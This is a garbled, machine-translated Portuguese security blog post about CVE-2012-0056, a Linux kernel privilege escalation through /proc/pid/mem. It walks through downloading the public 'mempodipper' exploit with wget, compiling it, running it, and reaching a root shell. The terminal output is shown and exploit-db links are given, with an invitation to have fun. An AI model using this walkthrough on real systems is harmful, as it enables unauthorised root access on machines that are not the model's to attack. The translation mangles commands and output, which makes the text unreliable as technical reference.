ClsHack:Computer Security Blog    

[CVE-2012-0056]Kernel do Linux Privilege Escalation >= 2.6.39, 32-bit e 64-bit

Postado em: 23 Janeiro 2012

Nova vlnerabilità para sistemas Linux com kernel> = 2.6.39 indiferente se 32 o para 64 bocado.
Esta vulnerabilidade permite uma Escalonamento de privilégios Então, para dimensionar e tornar-se privilégios de root.
A análise do exploit eu salvei o pdf porque o site do desenvolvedor para cima e para baixo :)

A vulnerabilidade descoberto por zx2c4 é muito grave:

Em 2.6.39, a proteção contra acesso não autorizado ao / proc / pid / mem foram consideradas suficientes, e assim o ifdef # antes que impediu escrever suporte para escrever a memória do processo arbitrário foi removido. Qualquer pessoa com as permissões corretas poderia escrever que processa a memória.

Um esempio diz exploit:

clshack@lb:~ $ Id
(clshack) gid = 1000(clshack) grupos = 1000(clshack),4(adm),20(dialout),24(cdrom),46(plugdev),114(lpadmin),116(admin),117(sambashare)
clshack@lb:~ $ Uname-a
 2 17:44:42 UTC 2012 x86_64 x86_64 x86_64 GNU / Linux
:~ $ Wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
--2012-01-23 14:58:01--  http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
. 173.236.178.65, 2607:f298:2:122::2e0:9c2
|173.236.178.65|:80... conectado.
HTTP requisição enviada, aguarda a resposta ... 200 OK
: 5161 (5,0K) [text / plain]
Economia: "mempodipper.c"

100%[======================================>] 5.161       24,7K / s, de 0,2 s

2012-01-23 14:58:02 (24,7 KB /mempodipper.cipper.c" salvo [5161/5161]

clshack@lb:~ $ Gcc-o exploit mempodipper.c
:~ $ Chmod   x exploit
:~ $. / Exploit
 21, 2012        =


[+] Abertura sockeclshack @ LB Esperando fd transferidos em pai.
[+] Execução de criança a partir de garfo criança.
[+] Abertura mem pai / proc/3728/mem em criança.
[+] Enviando fd 5 para o pai.
[+] Recebido em fd 5.
[+] Atribuindo fd 5 para stderr.
[+] Leitura para su saída @ plt.
[+] Resolvido saída @ plt para 0x4021d8.
[+] Calculando preenchimento su.
[+] Buscando compensar 0x4021d3.
[+] Execução de su com shellcode.
# ID
(root) gid = 0(root) grupos raizroot),4(adm),20(dialout),24(cdrom),46(plugdev),114(lpadmin),116(admin),117(sambashare),1000(clshack)
#sambashareadministradorlpadminplugdevcdromdialoutadmclshack

Jornal artigo:http://blog.zx2c4.com/749
Capaz de explorar exploitdb:http://www.exploit-db.com/exploits/18411/~~V
Baixar Analisi Exploit em PDF

Exploit testato su:
Linux lb 3.0.0-15-generic #25-Ubuntu SMP Mon Jan 2 17:44:42 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Divertir-se :D
Qualcosa di carino :

http://git.zx2c4.com/CVE-2012-0056

Related posts:

  1. [CVE 2010-3856]Biblioteca GNU C,Kernel Linux Vulnerabilidade escalação de privilégios
  2. [CVE-2010-3904]Kernel Linux Vulnerabilidade escalação de privilégios
  3. [Explorar]Kernel de escalonamento de privilégios
  4. [tutorial]Ferramenta para escalonamento de privilégios
  5. [CVE-2012-0207 Exploit]Linux Negação de serviço remota IGMP && Vídeo

Esta entrada foi postada na segunda-feira, 23 de janeiro, 2012 em 2:12 pm e está arquivada em Artigos sobre GNU / Linux, Hacking. Você pode acompanhar quaisquer respostas a esta entrada através do RSS 2.0 alimentar. Você pode deixar uma resposta, ou trackback a partir do seu próprio site.

Tagged com: